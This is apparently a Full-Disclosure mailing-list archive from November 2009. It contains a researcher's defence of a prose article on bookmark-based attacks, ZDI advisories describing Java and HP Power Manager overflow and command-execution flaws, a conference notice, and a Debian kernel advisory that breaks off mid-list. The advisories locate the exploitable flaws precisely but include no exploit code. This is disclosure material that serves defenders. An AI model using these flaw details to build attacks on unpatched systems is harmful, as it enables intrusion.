
I wrote some mitigation suggestions in Conclusions in article. More advanced
mitigation and prevention methods must be provided by browsers vendors, if
they will consider this threat as real.

I wrote this article without much technical details and PoCs (because PoCs
were posted at another page of my site, where I put link to), because I
planned to do so yet in summer 2008, where I decided to make such article.
It's "introduction to security problem" style (but detailed introduction),
when I'm introducing this threat to people (to the whole Internet). I have
never seen any articles and works on this subject before, so for me it's
looks like new threat (unkown to the masses).

And I didn't want to give working PoCs or exploits for bad guys (so the
article is more informational). If they interested in this subject, they
need to work by themselves to created working exploits ;-).

>From other side, there are my exploits for DoS attacks on browsers via
bookmarks, and for all 5 attack methods (social engineering, hacking of the
sites and changing of codes in links, two variants of using of viruses,
using of attacks with active (looped) proposition to add to bookmarks) I
wrote enough descriptions. For variants of using of viruses I'll be not
releasing any working codes, and for other attacks methods the descriptions
are sufficient.

By phrase "in modern browsers" in fifth method of attack I implied, that
JS-codes which is used to add to bookmark in modern browsers, which can be
used particularly for above-mentioned DoS attacks, can be used in this
attack method. To make this more clear, I just added the link to above
mentioned article here.

> No offense but scare-tactics don't help ANYBODY...

As I said this article is designed to draw attetion of people (the whole
Internet) to the problem. There is a proverb (in Ukraine and in Russia) - if
warned, then armed.

> As a sysadmin, I would've appreciated some more details or at least some
> answers to my questions above! :)

I'll always answer at your questions. If after these answers you have any
other questions, feel free to ask.

Soon I'll release new article about threat similar to attacks via bookmarks.
It's also concerned with browsers (these two articles and the threats
themselves have similarities). And new article will be writen in similar
"introduction to security problem" style.

> look forward to your continued, hopefully improved research results!

I'm always working to improve my research results. Soon I'll release new
article, as I said above. And meanwhile you can read my other researches and
articles. Like two before-menioned articles about redirectors and Cross-Site
Scripting attacks via redirectors (http://websecurity.com.ua/3386/) and
other articles at my site (http://websecurity.com.ua/category/articles/),
some of which are translated to English.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

----- Original Message ----- 
From: "Memisyazici, Aras" <arasm at vt.edu>
To: <full-disclosure at lists.grok.org.uk>
Cc: "MustLive" <mustlive at websecurity.com.ua>
Sent: Monday, November 02, 2009 3:51 PM
Subject: RE: [Full-disclosure] Dark side of bookmarks


MustLive:

I really don't want to start a flame-war nor am I trying to belittle you or
your work but...

Your "article", unless I misunderstood, is useless. To explain further, your
article lacks substance. For instance you state: "could be used in DoS
attack for browsers" yet you provide no working PoC/example(s)

What about mitigation? What about prevention?

No offense but scare-tactics don't help ANYBODY... As a sysadmin, I would've
appreciated some more details or at least some answers to my questions
above! :)

In any case, thank you for putting together such an entry and look forward
to your continued, hopefully improved research results!

Sincerely,
Aras 'Russ' Memisyazici
Systems Administrator
Virginia Tech

----------------------------------------------------------------------

Date: Sat, 31 Oct 2009 23:24:50 +0200
From: "MustLive" <mustlive at websecurity.com.ua>
Subject: [Full-disclosure] Dark side of bookmarks
To: <full-disclosure at lists.grok.org.uk>
Hello participants of Full-Disclosure!

After my articles about different attacks via redirectors - Redirectors: the
phantom menace (http://websecurity.com.ua/3495/) and Attacks via closed
redirectors (http://websecurity.com.ua/3531/), here is my new article. This
time about attacks via bookmarks. In article Dark side of bookmarks
(http://websecurity.com.ua/3643/) I'll tell you about risks of bookmarks in
browsers.

There are possible next attacks via bookmarks:

1. Spam.
2. Phishing.
3. Malware spreading.
4. DoS attacks.

You can read the article Dark side of bookmarks at my site:
http://websecurity.com.ua/3643/

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua


From zdi-disclosures at tippingpoint.com  Wed Nov  4 19:50:32 2009
From: zdi-disclosures at tippingpoint.com (ZDI Disclosures)
Date: Wed, 4 Nov 2009 13:50:32 -0600
Subject: [Full-disclosure] ZDI-09-077: Sun Java Web Start Arbitrary Command
 Execution Vulnerability
Message-ID: <EE499D69B3D0714590B6FE9762B046110381100D1B@emb01.unity.local>

ZDI-09-077: Sun Java Web Start Arbitrary Command Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-077
November 4, 2009

-- Affected Vendors:
Sun Microsystems

-- Affected Products:
Sun Microsystems Java Runtime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 9241. 
For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Sun Java WebStart. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists in the implementation of security model
permissions during the removal of installer extensions. By modifying an
existing installer extension JNLP file, a condition occurs that allows
for code supplied by a different URL than the original installer
extension URL to run as a secure applet. This condition can result in
arbitrary command injection under the privileges of the currently logged
in user.

-- Vendor Response:
Sun Microsystems has issued an update to correct this vulnerability. More
details can be found at:

http://sunsolve.sun.com/search/document.do?assetkey=1-66-269870-1

-- Disclosure Timeline:
2009-08-17 - Vulnerability reported to vendor
2009-11-04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Peter Csepely

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

From zdi-disclosures at tippingpoint.com  Wed Nov  4 19:50:38 2009
From: zdi-disclosures at tippingpoint.com (ZDI Disclosures)
Date: Wed, 4 Nov 2009 13:50:38 -0600
Subject: [Full-disclosure] ZDI-09-078: Sun Java Runtime AWT setDifflCM Stack
 Overflow Vulnerability
Message-ID: <EE499D69B3D0714590B6FE9762B046110381100D1C@emb01.unity.local>

ZDI-09-078: Sun Java Runtime AWT setDifflCM Stack Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-078
November 4, 2009

-- Affected Vendors:
Sun Microsystems

-- Affected Products:
Sun Microsystems Java Runtime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8404. 
For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Sun Java Runtime Environment. User
interaction is required to exploit this vulnerability in that the target
must visit a malicious page.

The specific flaw exists in the processing of arguments to the
setDiffICM AWT library function. Due to the lack of bounds checking on
one of the parameters to the function a stack overflow can occur.
Successful exploitation of this vulnerability can lead to remote system
compromise under the credentials of the currently logged in user.

-- Vendor Response:
Sun Microsystems has issued an update to correct this vulnerability. More
details can be found at:

http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1

-- Disclosure Timeline:
2009-08-14 - Vulnerability reported to vendor
2009-11-04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Peter Vreugdenhil ( http://vreugdenhilresearch.nl )

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

From zdi-disclosures at tippingpoint.com  Wed Nov  4 19:50:55 2009
From: zdi-disclosures at tippingpoint.com (ZDI Disclosures)
Date: Wed, 4 Nov 2009 13:50:55 -0600
Subject: [Full-disclosure] ZDI-09-079: Sun Java Runtime AWT setBytePixels
 Heap Overflow Vulnerability
Message-ID: <EE499D69B3D0714590B6FE9762B046110381100D1D@emb01.unity.local>

ZDI-09-079: Sun Java Runtime AWT setBytePixels Heap Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-079
November 4, 2009

-- Affected Vendors:
Sun Microsystems

-- Affected Products:
Sun Microsystems Java Runtime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8405. 
For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Sun Java Runtime Environment. User
interaction is required to exploit this vulnerability in that the target
must visit a malicious page.

The specific flaw exists in the processing of arguments to the
setBytePixels AWT library function. Due to the lack of bounds checking
on the parameters to the function a user controllable memcpy can result
in a heap overflow. Successful exploitation of this vulnerability can
lead to remote system compromise under the credentials of the currently
logged in user.

-- Vendor Response:
Sun Microsystems has issued an update to correct this vulnerability. More
details can be found at:

http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1

-- Disclosure Timeline:
2009-08-14 - Vulnerability reported to vendor
2009-11-04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Peter Vreugdenhil ( http://vreugdenhilresearch.nl )

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

From zdi-disclosures at tippingpoint.com  Wed Nov  4 19:50:57 2009
From: zdi-disclosures at tippingpoint.com (ZDI Disclosures)
Date: Wed, 4 Nov 2009 13:50:57 -0600
Subject: [Full-disclosure] ZDI-09-080: Sun Java Runtime Environment
 JPEGImageReader Heap Overflow Vulnerability
Message-ID: <EE499D69B3D0714590B6FE9762B046110381100D1E@emb01.unity.local>

ZDI-09-080: Sun Java Runtime Environment JPEGImageReader Heap Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-080
November 4, 2009

-- Affected Vendors:
Sun Microsystems

-- Affected Products:
Sun Microsystems Java Runtime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8701. 
For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Sun's Java Runtime Environment. User
interaction is required to exploit this vulnerability in that the target
must visit a malicious page.

The specific flaw exists in the processing of JPEG image dimensions.
When specifying large values to the dimensions of a subsample an integer
overflow occurs leading to memory corruption. Successful exploitation of
this vulnerability can lead to remote compromise under the credentials
of the currently logged in user.

-- Vendor Response:
Sun Microsystems has issued an update to correct this vulnerability. More
details can be found at:

http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1

-- Disclosure Timeline:
2009-08-20 - Vulnerability reported to vendor
2009-11-04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * regenrecht

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

From zdi-disclosures at tippingpoint.com  Thu Nov  5 18:08:36 2009
From: zdi-disclosures at tippingpoint.com (ZDI Disclosures)
Date: Thu, 5 Nov 2009 12:08:36 -0600
Subject: [Full-disclosure] ZDI-09-081: Hewlett-Packard Power Manager
 Administration Web Server Stack Overflow Vulnerability
Message-ID: <EE499D69B3D0714590B6FE9762B046110381100D20@emb01.unity.local>

ZDI-09-081: Hewlett-Packard Power Manager Administration Web Server Stack Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-081
November 5, 2009

-- CVE ID:
CVE-2009-2685

-- Affected Vendors:
Hewlett-Packard

-- Affected Products:
Hewlett-Packard Power Manager

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8314. 
For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Hewlett-Packard Power Manager.
Authentication is not required to exploit this vulnerability.

The specific flaw exists in the handling of URL parameters when posting
to the login form of the web based management web server. Proper bounds
checking is not applied when parsing the Login variable which can result
in an exploitable stack overflow. Successful exploitation can lead to
complete system compromise under the SYSTEM credentials.

-- Vendor Response:
Hewlett-Packard has issued an update to correct this vulnerability. More
details can be found at:

http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01905743

-- Disclosure Timeline:
2009-06-25 - Vulnerability reported to vendor
2009-11-05 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Janek Vind

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

From zdi-disclosures at tippingpoint.com  Wed Nov  4 19:50:23 2009
From: zdi-disclosures at tippingpoint.com (ZDI Disclosures)
Date: Wed, 4 Nov 2009 13:50:23 -0600
Subject: [Full-disclosure] ZDI-09-076: Sun Java HsbParser.getSoundBank Stack
 Buffer Overflow Vulnerability
Message-ID: <EE499D69B3D0714590B6FE9762B046110381100D1A@emb01.unity.local>

ZDI-09-076: Sun Java HsbParser.getSoundBank Stack Buffer Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-076
November 4, 2009

-- Affected Vendors:
Sun Microsystems

-- Affected Products:
Sun Microsystems Java Runtime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8700. 
For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Sun Microsystems Java. User interaction is
required in that a user must open a malicious file or visit a malicious
web page.

The specific flaw exists in the parsing of long file:// URL arguments to
the getSoundbank() function. Due to a lack of bounds checking on user
supplied data a stack overflow can occur leading to remote code
execution. Exploitation of this vulnerability can lead to system
compromise under the credentials of the currently logged in user.

-- Vendor Response:
Sun Microsystems has issued an update to correct this vulnerability. More
details can be found at:

http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1

-- Disclosure Timeline:
2009-06-23 - Vulnerability reported to vendor
2009-11-04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

From andrzej.targosz at gmail.com  Thu Nov  5 01:13:15 2009
From: andrzej.targosz at gmail.com (Andrzej Targosz)
Date: Thu, 5 Nov 2009 02:13:15 +0100
Subject: [Full-disclosure] CONFidence 2.0, schedule online,
	last time to register.
Message-ID: <97674b3b0911041713m7cdab53cme5dc99dbc286f6c0@mail.gmail.com>

Dear Madame/Sir,

CONFidence is the one of the most technical conference in Eastern
Europe. You can find videos from the latest edition here:
http://200902.confidence.org.pl/materialy-maj-2009

You can find all informations here:
http://200902.confidence.org.pl

Speakers list (alfabetical order):
   * Chema Alonso
   * Jacob Appelbaum ? keynote
   * Jesse Burns
   * Frank Breedijk
   * ?ukasz Bromirski
   * Raoul Chiesa
   * Gynvael Coldwind
   * Claudio Criscione
   * Bernardo Damele
   * Nick DePetrillo
   * Leonardo NVE Egea
   * Przemys?aw Frasunek
   * Sandro Gauci
   * Brad ?RenderMan? Haines
   * Mario Heiderich
   * Nadia Heninger
   * Gareth Heyes
   * Moti Joseph
   * Mike ?Dragorn? Kershaw
   * Guido Landi
   * ?FX? Felix Lindner
   * Pavol Luptak
   * Jos? Parada
   * Alessio Pennasilico
   * Alessandro Rossetti
   * Michael ?theprez98? Schearer
   * Eddie Schwartz
   * Richard Thieme ? keynote

I hope to see you in Warsaw.
Best regards,
Andrzej Targosz

--
CONFidence 2.0 Security CONFerence
November 19th -20th 2009, Warsaw, Poland
http://200902.confidence.org.pl


From dannf at debian.org  Thu Nov  5 16:21:03 2009
From: dannf at debian.org (dann frazier)
Date: Thu, 5 Nov 2009 09:21:03 -0700
Subject: [Full-disclosure] [SECURITY] [DSA 1927-1] New Linux 2.6.26 packages
	fix several vulnerabilities
Message-ID: <20091105162103.GH29129@ldl.fc.hp.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ----------------------------------------------------------------------
Debian Security Advisory DSA-1927-1                security at debian.org
http://www.debian.org/security/                           dann frazier
November 5, 2009                    http://www.debian.org/security/faq
- ----------------------------------------------------------------------

Package        : linux-2.6
Vulnerability  : privilege escalation/denial of service/sensitive memory leak
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2009-3228 CVE-2009-3238 CVE-2009-3547 CVE-2009-3612
                 CVE-2009-3620 CVE-2009-3621 CVE-2009-3638

Notice: Debian 5.0.4, the next point release of Debian 'lenny', will
include a new default value for the mmap_min_addr tunable.  This
change will add an additional safeguard against a class of security
vulnerabilities known as "NULL pointer dereference" vulnerabilities,
but it will need to be overridden when using certain applications.
Additional information about this change, including instructions for
making this change locally in advance of 5.0.4 (recommended), can be
found at:
  http://wiki.debian.org/mmap_min_addr

Several vulnerabilities have been discovered in the Linux kernel that
may lead to a denial of service, sensitive memory leak or privilege
escalation.  The Common Vulnerabilities and Exposures project
identifies the following problems:

CVE-2009-3228

    Eric Dumazet reported an instance of uninitialized kernel memory
    in the network packet scheduler. Local users may be able to
    exploit this issue to read the contents of sensitive kernel
    memory.
  
CVE-2009-3238

    Linus Torvalds provided a change to the get_random_int() function
    to increase its randomness.

CVE-2009-3547

    Earl Chew discovered a NULL pointer dereference issue in the
    pipe_rdwr_open function which can be used by local users to gain
    elevated privileges.

CVE-2009-3612

    Jiri Pirko discovered a typo in the initialization of a structure
    in the netlink subsystem that may allow local users to gain access
    to sensitive kernel memory.

CVE-2009-3620

    Ben Hutchings discovered an issue in the DRM manager for ATI Rage
    128 graphics adapters. Local users may be able to exploit this
    vulnerability to cause a denial of service (NULL pointer
    dereference).

CVE-2009-3621

    Tomoki Sekiyama discovered a deadlock condition in the UNIX domain
    socket implementation. Local users can exploit this vulnerability
    to cause a denial of service (system hang).

CVE-2009-3638

    David Wagner reported an overflow in the KVM subsystem on i386
    systems. This issue is exploitable by local users with access to
    the /dev/kvm device file.

For the stable distribution (lenny), this problem has been fixed in
version 2.6.26-19lenny2.

For the oldstable distribution (etch), these problems, where
applicable, will be fixed in updates to linux-2.6 and linux-2.6.24.

We recommend that you upgrade your linux-2.6 and user-mode-linux
packages.

Note: Debian carefully tracks all known security issues across every
linux kernel package in all releases under active security support.
However, given the high frequency at which low-severity security
issues are discovered in the kernel and the resource requirements of
doing an update, updates for lower priority issues will normally not
be released for all kernels at the same time. Rather, they will be
released in a staggered or "leap-frog" fashion.

The following matrix lists additional source packages that were
rebuilt for compatibility with or to take advantage of this update:

                                             Debian 5.0 (lenny)
     user-mode-linux                         2.6.26-1um-2+19lenny2

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Stable updates are available for alpha, amd64, armel, hppa, i386,
ia64, and powerpc. Updates for other architectures will be released
as they become available.

Source archives:

  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-19lenny2.dsc
    Size/MD5 checksum:     5778 8ea6c47c6f227f855a41deea57d988d8
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-19lenny2.diff.gz
    Size/MD5 checksum:  7651053 5cf749f9817436c544df97bc0217f125
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26.orig.tar.gz
    Size/MD5 checksum: 61818969 85e039c2588d5bf3cb781d1c9218bbcb

Architecture independent packages:

  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-19lenny2_all.deb
    Size/MD5 checksum:   106866 d25eeb65132ec68406d8fdf7ea340274
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-19lenny2_all.deb
    Size/MD5 checksum:  4627374 196ffe954d4e906638c7eb2bd22e310d
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-19lenny2_all.deb
    Size/MD5 checksum:  2565284 0682418bd83f755a17a71435e535f91a
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-19lenny2_all.deb
    Size/MD5 checksum: 48672074 5aa4d0110919b100a772509455b22757
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-19lenny2_all.deb
    Size/MD5 checksum:  1768032 cb95ea5101339c35d425ac1ba2f0ff02
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-19lenny2_all.deb
    Size/MD5 checksum:   122160 0d3dd77a86989aa6e6bdfbbf548d22a6

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-19lenny2_alpha.deb
    Size/MD5 checksum:   106376 891beea699175e77b6f4cdb1dbbd2377
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-19lenny2_alpha.deb
    Size/MD5 checksum:   363880 278fefb639e7029af6d5017dedefb500
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-19lenny2_alpha.deb
    Size/MD5 checksum: 28487296 beb21f0f222b507898406b051d161c25
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-19lenny2_alpha.deb
    Size/MD5 checksum:   106358 b4c10db49252b22e7019746743624712
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-19lenny2_alpha.deb
    Size/MD5 checksum:   741234 b08b288693ab9d0d3fa1e8141ba4f038
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-19lenny2_alpha.deb
    Size/MD5 checksum: 28471478 f412fb78f0dfac51f6e39a035538fe91
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-19lenny2_alpha.deb
    Size/MD5 checksum:   365312 9147bf190b4dce64fb4783b0c0aba8be
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-19lenny2_alpha.deb
    Size/MD5 checksum:   364408 66cd6736f72c0eedabbad596baac8888
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-19lenny2_alpha.deb
    Size/MD5 checksum: 29177668 abb9bcc21a5fcb0a7352a30fb7209ca1
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-19lenny2_alpha.deb
    Size/MD5 checksum:  3543732 d84be29426f1d706617a6ad91d3b6109

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-19lenny2_amd64.deb
    Size/MD5 checksum:   389134 2ac60b6aaece8351c023cecbb4bd41ee
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-19lenny2_amd64.deb
    Size/MD5 checksum:   749556 c994eeb54dd967b5255448e80fa4911c
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-amd64_2.6.26-19lenny2_amd64.deb
    Size/MD5 checksum:   389740 8b6b5b10fe023670ca8cf9326d46ccd0
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-amd64_2.6.26-19lenny2_amd64.deb
    Size/MD5 checksum:   394262 8398b2d9ce752ffa39ac55b8f55fa1b7
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-19lenny2_amd64.deb
    Size/MD5 checksum:  3719144 1fa20cc556fbfecdf0c2335a3c9edeee
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-19lenny2_amd64.deb
    Size/MD5 checksum:   106352 edb758613531f5c655c8451f1136b62a
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-amd64_2.6.26-19lenny2_amd64.deb
    Size/MD5 checksum:   106378 dd749481c75a66f517551c6b21b3bbbb
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-amd64_2.6.26-19lenny2_amd64.deb
    Size/MD5 checksum: 19274410 21621e01b880d1f222007e3101d255c6
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-amd64_2.6.26-19lenny2_amd64.deb
    Size/MD5 checksum: 21053742 015990eedbce234dfa4facdf02f6ad60
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-19lenny2_amd64.deb
    Size/MD5 checksum:  3851500 355a9cc7757195196006160929313e78
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-amd64_2.6.26-19lenny2_amd64.deb
    Size/MD5 checksum: 20902812 3af1d1431ff5674b7aeaf41c784d3ba6
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-19lenny2_amd64.deb
    Size/MD5 checksum:  3751848 f5289bf2c22a6112d13a9af6d4291226
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-amd64_2.6.26-19lenny2_amd64.deb
    Size/MD5 checksum:  1804900 8ea5afa2f5e29175e92975ef93144b9a
  http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-amd64_2.6.26-19lenny2_amd64.deb
    Size/MD5 checksum:   106334 2620974dbbc17bbab4aefe183584a6da
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-19lenny2_amd64.deb
    Size/MD5 checksum:  3774804 8fa1254acec879820c17dd8e2e4eee56
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-19lenny2_amd64.deb
    Size/MD5 checksum: 20886016 71a1f29b66ee30cf7a63b77cddc71ec7
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-amd64_2.6.26-19lenny2_amd64.deb
